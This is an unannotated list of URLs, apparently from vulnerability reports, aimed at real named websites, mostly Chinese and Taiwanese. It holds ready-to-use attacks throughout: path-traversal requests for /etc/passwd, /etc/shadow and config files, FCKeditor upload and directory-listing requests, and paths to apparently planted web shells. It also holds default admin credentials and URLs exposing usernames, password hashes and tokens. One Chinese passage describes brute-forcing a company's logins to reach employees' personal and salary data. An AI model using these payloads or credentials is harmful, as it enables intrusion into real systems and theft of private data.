http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated www.ie.wh.sdu.edu.cn/download.jsp?filename=../download.jsp&realname=download.jsp www.ie.wh.sdu.edu.cn/download.jsp?filename=../WEB-INF/web.xml&realname=web.xml www.ie.wh.sdu.edu.cn/download.jsp?filename=../../../../../../../../../../../../../../root/.bash_history&realname=bash_history www.ie.wh.sdu.edu.cn/download.jsp?filename=../../../../../../../../../../../../../../etc/passwd&realname=passwd www.ie.wh.sdu.edu.cn/download.jsp?filename=../../../../../../../../../../../../../../etc/shadow&realname=shadow http://passport.weibo.com/visitor/visitor?a=restore&cb=?&from=weibo&_rand=0.7968236310407519 www.kuwo.cn http://tongji.unihr.cn/ http://**.**.**.**:6088/Edit/editor/fckeditor.html 
http://**.**.**.**/Edit/editor/fckeditor.html http://**.**.**.**:801//Edit/editor/fckeditor.html http://**.**.**.**/Edit/editor/fckeditor.html http://**.**.**.**:801/Edit/editor/fckeditor.html http://www.joycloud.cn/ http://www.joycloud.cn:81/ www.fxiaoke.com http://www.fxiaoke.com admin:service=DeploymentFileRepository https://**.**.**.**:8000/wooyun/woo.jsp https://**.**.**.**:8000/is/index.jsp http://faqservice.ztems.com/ZTEFaqMobile/FAQService.action: http://test.home.sudiyi.cn/ https://111.205.237.129/por/login_psw.csp?rnd=012044611216487144 http://服务器地址/config/config_manage/leak_location http://服务器地址/config/config_manage/leak_location http://article.zol.com.cn/admin/index1.php http://article.zol.com.cn/admin/module_ajax.php?id=1&val=373* http://mail2.myhostadmin.net:8090//login.php?showid= http://mail2.myhostadmin.net//login.php?showaddr=1 http://tc.homelink.com.cn/Login.aspx http://221.10.127.22/ http://bsm.sdidc.com.cn/ http://gkcf.dzwww.com/WEB-INF/web.xml http://gkcf.dzwww.com/WEB-INF/applicationContext.xml http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**/getProductQualification.do?productCode=1000100887 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**//managerProductDetail.do?productid=9950004 http://**.**.**.**/admin//managerProductDetail.do?productid=9950004 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 
http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 http://**.**.**.**/getProductImgs.do?productCode=10050001&productId=9950001 https://github.com/ http://113.31.81.147:8000/phpinfo.php http://yum.uxin.com/centos/ http://vps2.uxin.com/icons/ http://113.31.81.147:8002/admin/ http://pay.uxin.com/test.php http://apitest.uxin.com/test.html http://int.variflight.com:80/ http://**.**.**.**/salelist.jsp?infoid=16&type=L&applyid=-1 http://**.**.**.**:9080/salelist.jsp?infoid=16&type=L&applyid=-1 http://**.**.**.**:8000/salelist.jsp?infoid=16&type=L&applyid=-1 http://**.**.**.**/salelist.jsp?infoid=16&type=L&applyid=-1 http://api.iqegg.com/interface.php?m=user&a=login http://www.khfdc.com/map/Common.aspx http://www.tgfgj.com/map/Common.aspx http://www.lhfgc.gov.cn/map/Common.aspx http://www.jxxjfgj.cn/map/Common.aspx http://www.afxfdc.cn/map/Common.aspx http://www.fyxfgj.com/map/Common.aspx http://ey1linktrace.ctrip.com ip:222.73.109.101 http://www.cscec.com/,点击右上角的“办公信息系统”进行登陆,此处验证码可重用,可用猪猪侠的常用用户名获取有效账号。网址二:http://oa.cscec.com/extcomponent/security/loginnoredirect.jsp,此处左下角提示可用移动端进行登陆,移动端地址为:http://oa.cscec.com/cscecPhone/,此处根本无验证码,可直接进行爆破,密码与网址一登陆处通用。用某个账号登陆后,可进入邮箱,进入工作台,查看公司通讯录,爬取邮箱名,将用户名再做成字典,又可跑出不少账号。网址三:http://cscec-hr1.cscec.com.cn:8080/templates/index/employLogon.jsp,此为人力资源系统网站,此处虽然不能直接从办公信息系统进行登陆,但是此处验证码是可以重用的,用之前爬取用户名进行爆破,获得二百多个有效账号,里面包括很多敏感信息,有个人身份信息、家庭人员信息、个人培训经历、薪资等等,权限高的账号还可以查看其他所有人员信息(看到了易军副部长、官庆董事长信息)。 http://www.wom186.com:10002/ http://www.wom186.com:10002/UserFiles/File/aimei1.jsp http://www.wom186.com:10002/UserFiles/File/aimei2.jsp jdbc:oracle:thin:@130.30.15.31:1528:oraacc http://www.guoli.com/ http://www.guoli.com/renwen/index.php?&longterm=1&sp1=0 http://www.isec.ac.cn/ http://www.isec.ac.cn/admin/login.aspx http://www.isec.ac.cn/fckeditor/editor/dialog/fck_about.html 
http://www.myhack58.com/Article/html/3/62/2012/33638.htm http://www.t00ts.net/post-29.html http://www.isec.ac.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.isec.ac.cn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp http://www.isec.ac.cn/fckeditor/editor/filemanager/browser/default/browser.html http://www.isec.ac.cn/fckeditor/editor/filemanager/connectors/test.html www.dslrpark.com www.test.com http://**.**.**/login.php http://baoxian.cnair.com/ http://print.cnair.com/ http://218.4.112.226 http://218.4.112.226/GiantHopePage/Index.aspx http://218.4.112.226/GiantHopePage/Logintest.aspx www.kfedu.com.cn/开封教育网-new_20150403_2.rar http://sfzx.hbust.com.cn/admin/admin_login.asp admin:admin888 http://sfzx.hbust.com.cn/x.asp http://www.fcbayern.cn/ http://www.fcbayern.cn/admin http://www.fcbayern.cn/auth/login http://211.138.17.17:8081/ http://211.138.17.17:8081/hacnms/control/update?_ENTITY=UserLogin&userLoginId=admin&CHANGE_PASSWORD=Y¤tPassword=admin&checkPassword=admin url:http://lshr.lishui.gov.cn/Article/ArticleNews1.aspx?TypeIDLv2=27 http://edu.shm.com.cn/txy/article/news?departmentId=6 http://edu.shm.com.cn/edu/train/index?Train[name]=&Train[categoryid]=2%27&Train[price]=&Train[areaid]=&Train[updatetime]=&yt0=----Train[categoryid]- http://app1.iqegg.com/.git/config http://api.iqegg.com/.git/config http://app1.iqegg.com/show.php?devid=386c661b6208 http://app1.iqegg.com/mqtt/index.php http://www.younglight.com.cn/ http://www.younglight.com.cn/ps/moa/userlogin.jsp http://**.**.**.**:8001//paper/forget1.jsp http://**.**.**.**:8080//paper/forget1.jsp http://**.**.**.**:8001/paper/forget1.jsp http://itjuzi.com/investevents?scope=115&sub_scope=116 http://itjuzi.com/investscope?type=invsp&id=1 http://itjuzi.com/.svn/entries http://itjuzi.com/images/.svn/entries http://itjuzi.com/images/.DS_Store http://sh.itjuzi.com/.svn/entries 
http://today.itjuzi.com/.git/config http://www.yy110.gov.cn/components/upload/uploadWindow.jsp?randomId= http://www.yy110.gov.cn//upload/20150704/1435958522281.jsp http://121.28.7.114/index.aspx http://121.28.7.114/Images/ http://121.28.7.114/attach/ http://121.28.7.114/scripts/ http://121.28.7.114/css/ http://121.28.7.114/admin/test.aspx http://121.28.7.114/attach/,此页面可下载网站备份文件 http://121.28.7.114/attach/ https://ssl.mail.163.com/config/mobileconfig/index http://blog.19ued.com/ http://blog.19ued.com/?author=1 http://blog.19ued.com/?author=100 http://www.114best.com/ip/114.aspx?w=61.146.178.37 http://www.cndns.com/members/getpass.aspx http://www.qiye001.com/ http://61.50.166.36/b2b/web/four/indexinfoAction.do?actionType=aboutUs http://61.50.166.36/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://61.50.166.36/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../../ http://120.204.199.54/login http://221.7.54.196:90 http://221.7.54.196:90/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://www.mail2000.com.tw/官網底下找到了試用帳號 http://221.180.145.206/ http://sysjt.lnmobilepay.com:8002/mpsweb/ http://www.12556633.com/sysadmin/login.aspx http://203.90.140.115/logonAction.do http://203.90.140.115/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://203.90.140.115/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../../ http://**.**.**.** http://**.**.**.**/goa/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewView.aspx?ID=1104 http://**.**.**.**:8080/c6/Jhsoft.Web.login/NewView.aspx?ID=1030 
http://**.**.**.**/c6/JHSoft.Web.Login/NewCList.aspx?ID=7 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewCList.aspx?id=115 http://**.**.**.**/C6/JHSoft.Web.Login/NewCView.aspx?ID=1059 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewCView.aspx?ID=1002 http://**.**.**.**:8080/c6/Jhsoft.Web.login/NewCView.aspx?ID=1030 http://99dai.cn/backPassWord.aspx http://99dai.cn/backPassWord.aspx重置,随便重置个,就重置99贷这个用户吧 http://220.181.69.19:8080/ http://www.nju.edu.tw/njpb/shownews.aspx?id=9 http://video.ee.ntu.edu.tw/.git/config http://www.cust.edu.tw http://isv.chinac.com/index_toParam.action?urlParam=../../../WEB-INF/web.xml%3f http://www.jj.hc360.com/wp-content/plugins/db-backup/download.php?file=/etc/passwd http://www.jj.hc360.com/wp-content/plugins/db-backup/download.php?file=/usr/local/apache2/htdocs/wp-config.php http://www.108.com.tw/main04/members/search_members_childminder_list.php?Cid=7&CCid=82 http://116.213.100.71/ http://server1.cdce.cn/ http://server2.cdce.cn/ http://www.fxiaoke.com/H/Account/MobileBinding/ http://www.fxiaoke.com/H/Account/MobileBinding/ http://**.**.**/login.aspx http://www.chinacoal-ins.com/ http://218.26.255.213/ http://61.50.166.36/logonAction.do http://61.50.166.36/console http://61.191.45.240/Logout http://www.zjzx.ah.cn/manage-webapp/pay/manage/order.action http://pm.weaver.cn:9085/main/login.jsp http://www.shzfcg.gov.cn:8090/new_web/cjxx/contact_operator.jsp?operator_no=157 http://www.shzfcg.gov.cn:8090/ne http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-075628中注入点一样 http://zz.speiyou.com/search/index/subject:/grade:9/level:bx/term:/gtype:time inurl:a.120ask.com/&email= http://a.120ask.com/askregshow?fromUrl=aHR0cDovL3d3dy4xMjBhc2suY29tLw==&showtype=0&usertype=1&v=a7a1d8cf9ce842b8b4f7b8f3d82dc8b3&email=kkkiujghh@126.com&id=58684216&code=815969&username=kkkiujghh 
http://a.120ask.com/askregshow?fromUrl=aHR0cDovL3d3dy4xMjBhc2suY29tLw==&showtype=2&usertype=1&v=c9795b0d2fb2739fc1409e898def18a9&email=466196038@qq.com&id=58642925&code=492376&username=ask5864292597 http://www.xnjz.com/adminweb/js/kindeditor/attached/file/20150705/20150705020033_6324.htm这是黑页!后台http://www.xnjz.com/adminweb http://www.easelandhotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 aihotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 baohonghotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 baolilai-hotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 bmgcn.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 chinameetings.cn/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dehan.test.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 devpaytmpl3v15.test.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 
dgdh.test.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dggarden.royalhotels.cn/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dgrhm.group.dossm.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 dzhgz.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 easelandhotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 electron.physics.buffalo.edu/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 fhschotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 guangzhougdhhotel.com/saas/Product/getObjectStru/?jsoncallback=jQuery19106749923299066722_1426851268205&catalog_id=&object_name=CMemberOrder&client_account=gz_yljr&language=zh-tw&code=&_=1426851268208 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com 
www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://www.easelandhotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 aihotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 
baohonghotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 baolilai-hotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 bmgcn.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 chinameetings.cn/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dehan.test.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 devpaytmpl3v15.test.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dgdh.test.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dggarden.royalhotels.cn/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dgrhm.group.dossm.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 dzhgz.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 easelandhotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 electron.physics.buffalo.edu/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 
fhschotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 guangzhougdhhotel.com/saas/Guest/update/?jsoncallback=jQuery1910666327578946948_1426849309962&client_account=gz_yljr&language=zh-tw&code=¶m=&_=1426849309965 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com 
www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://superbuy.mplife.com/Wap/Pay/Verify.aspx?referrerUrl=http%3a%2f%2fsuperbuy.mplife.com%2fwap%2fpay%2fMyOrder.aspx%3fm%3d1%26i%3d0eea53a3-2ea3-45c4-bbf1-044bfe0ed0ff http://bsm.sdidc.com.cn/logout.do?type=manager http://219.238.150.151:8088/login.action http://mss.95522.cn/vote/vote/?param=6e20ccf582c0145f71362141037cfb4e&openId=opKa3jlaQnSyVRN4LgdjDZ_jEU4Y&randomNum=487336 http://mss.95522.cn/vote/vote/?param=b17215b9a8f3add82f2a2a27772bc6eb&openId=opKa3jqdKN6IsSDeG23E_t5PeIkc&randomNum=931840 http://mss.95522.cn/vote/vote/?param=2e0aa04b56e5dcfdc4bc751ab7570b3a&openId=opKa3jifz0o9GvxHU5c7a3KRkRoQ&randomNum=089853 http://mss.95522.cn/vote/agentInfo/ http://cwch.ahu.edu.cn/querynetweb/admin/UserManager.aspx http://cwch.ahu.edu.cn/querynetweb/ http://www.xinnet.com/user/user.do?method=toFindPwd http://**.**.**.**/bugs/wooyun-2015-0123148上一个 http://www.masterlink.com.tw http://www.masterlink.com.tw:2480 http://www.masterlink.com.tw/DownloadFile.aspx?filename=../web.config&tableName=Download&serialNo=2286 http://gps.ha-online.cn/ http://gps.ha-online.cn/login.action http://gps.ha-online.cn/test.txt http://im.suning.com/updates/ http://im.suning.com/updates/DEV/CPP/WINDOWS/1.4.5.1/ http://www.tdxinfo.com https://member.tdxinfo.com http://store.tdxinfo.com http://www.sinochemoil.com/esbclient/database/datebase_back.php http://yjsgl.suda.edu.cn/gmis/login.aspx http://isv.chinac.com:80/manufacturer_tologin.action http://isv.chinac.com:80/manufacturer_tologin.action http://my.dance365.com/site/email http://yxzfs.csc.edu.cn/scholarship/main/person/login.jsf http://beta.buy.mplife.com/admin 
http://**.**.**.**/bugs/wooyun-2010-0104635 http://**.**.**.**/bugs/wooyun-2010-0102444 http://**.**.**.**/bugs/wooyun-2015-091128 http://xuntejing.tsgaj.gov.cn/posts.php?type=../../../../../../../etc/passwd http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=2345 http://xwzx.cqupt.edu.cn/xwzx/news_search.php?string=aa&type=content download.dili360.com/?act=download&vid=2】 http://isv.chinac.com:80/manufacturer_tologin.action http://jkgj.114gh.cn/ http://jkgj.114gh.cn/FindPassWord.aspx site:macom.263.net/ http://macom.263.net/audit!login.action?username=zhuangmingfang@tse-c.com.cn&tempkey=BcPpXaSon4&auditLog=ff8080814b218950014b242b4e9928d9&status=4&opinion=1 Re:P42M相关资料需求 http://macom.263.net/audit!login.action?username=zhuangmingfang@tse-c.com.cn&tempkey=BcPpXaSon4&auditLog=ff8080814b218950014b242b4e9928d9&status=4&opinion=1 http://macom.263.net/audit!login.action?username=zhuangmingfang@tse-c.com.cn&tempkey=BcPpXaSon4&auditLog=ff8080814b218950014b242b4e9928d9&status=4&opinion=1 http://macom.263.net/audit!login.action?username=wdm@sanwa-group.com.cn&tempkey=M3uLfp2kgL&auditLog=ff8080814afd7cd4014b057446fa6248&status=4&opinion=1 http://news.jschina.com.cn/system/2014/09/24/021963438.shtml site:jsids.telecomjs.com https://www.baidu.com/s?wd=site%3Ajsids.telecomjs.com&pn=0&oq=site%3Ajsids.telecomjs.com&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=d4337223000136ae&rsv_t=6a2c3z6LhF1hMKAaSJnlAhmu2wNj2nWwp2LSaAr4KkTC9GzcfyQM1Bi67nBN7p6YsFDa http://jsids.telecomjs.com/ida40/print.jhtml?isHistory=Y&itemCode=IDT_PUB_PRINT_OPEN_BILLDETAIL&billId=2021335246&natId=0000005&billType=1 http://wt.etao189.com/login.jhtml http://**.**.**.**/bugs/wooyun-2015-0110745而发 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8001/default.aspx http://**.**.**.**/ http://**.**.**.**/fygx/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8080/ http://**.**.**.**:81/ http://ebusiness.coscon.com/ebcd/security/freightEntrustCdList/toEdit.do?cdBasicUuid=230117&userId=AIRTIGEREXPRESSQ 
http://ebusiness.coscon.com/ebcd/security/freightEntrustCdList/toEdit.do?cdBasicUuid=230118&userId=AIRTIGEREXPRESSQ http://ebusiness.coscon.com/ebcd/security/freightEntrustCdList/toEdit.do?cdBasicUuid=230119 inurl:bbs.tianya.cn/?username inurl:bbs.tianya.cn/?password http://bbs.tianya.cn/m/post-free-4955110-1.shtml?openudid=5E5F256F-6141-4A0D-B7E5-3D7BA2607D3A&device=iphone&userid=5436755&username=poper001&password=c0b799e410766626 http://bbs.tianya.cn/m/post-free-5105951-1.shtml?openudid=cc50fb8f78e24a9a4876de9b859c35ac3fb6c3e0&device=iphone&userid=5506474 http://bbs.tianya.cn/m/post-worldlook-466596-1.shtml?openudid=C489AA85-C3DD-4AB8-9671-6FD03E876BAD&device=iphone&userid=5570692&username=shark8860&password=b4dad5a0ea8624a7 http://bbs.tianya.cn/m/post-free-5044854-1.shtml?openudid=057333EA-09F2-47EC-AF04-AA3C6213F6E1&device=iphone&userid=15048341&username=leng007z&password=262f4b349a4b9576 http://mp.weixin.qq.com/ http://www.centfor.com/admin/login.php http://222.74.229.206:8080/Main/LogIn.aspx http://222.74.229.220/Main/LogIn.aspx http://www.cqgp.gov.cn/home/1/pages/picNewsContent.jsp?id=8 http://www.cqgp.gov.cn/home/1/pages/picNewsC http://sqlmap.org http://www.centfor.com/htdocs.zip http://www.centfor.com/phpmyadmin/ http://www.hadc.gov.cn/info/ http://www.hadc.gov.cn/info/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.hadc.gov.cn/info/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=%2F http://www.hadc.gov.cn/info/FCKeditor/editor/filemanager/browser/default/frmupload.html http://lama.youku.com/Admin/index.php/Public/login url:http://61.153.250.106:81/manager/html user:admin pass:admin http://ticket.china.com.cn//admin/ http://china-aibo.cn/ http://china-aibo.cn/piw/Api/Download.jsp?path=/WEB-INF/web.xml&fileName=web.xml 
http://china-aibo.cn/piw/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../ http://**.**.**.**/webpages/powercode_public_list_page.aspx http://**.**.**.**/tzptweb/webpages/powercode_public_list_page.aspx http://**.**.**.**/webpages/message_list_page.aspx http://**.**.**.**/tzptweb/webpages/message_list_page.aspx http://**.**.**.**/bugs/wooyun-2015-0100250没有重复,文件不同。 http://**.**.**.**//webpages/service_list_page.aspx http://**.**.**.**/tzptweb//webpages/service_list_page.aspx http://www.bjzbb.com http://www.bjzbb.com/piw/Api/Download.jsp?path=/WEB-INF/web.xml&fileName=web.xml http://www.bjzbb.com/piw/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/../../ http://www.bjzbb.com/piw/1.jsp http://**.**.**.**/ http://**.**.**.**/Web/Login.aspx http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=6 http://**.**.**.** http://**.**.**.**/Web/Qikan.aspx http://**.**.**.**/CommonPage.aspx?Id=6 http://**.**.**.**/web/CommonPage.aspx?Id=36 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/Qikan.aspx http://www.xbiao.com:80/ 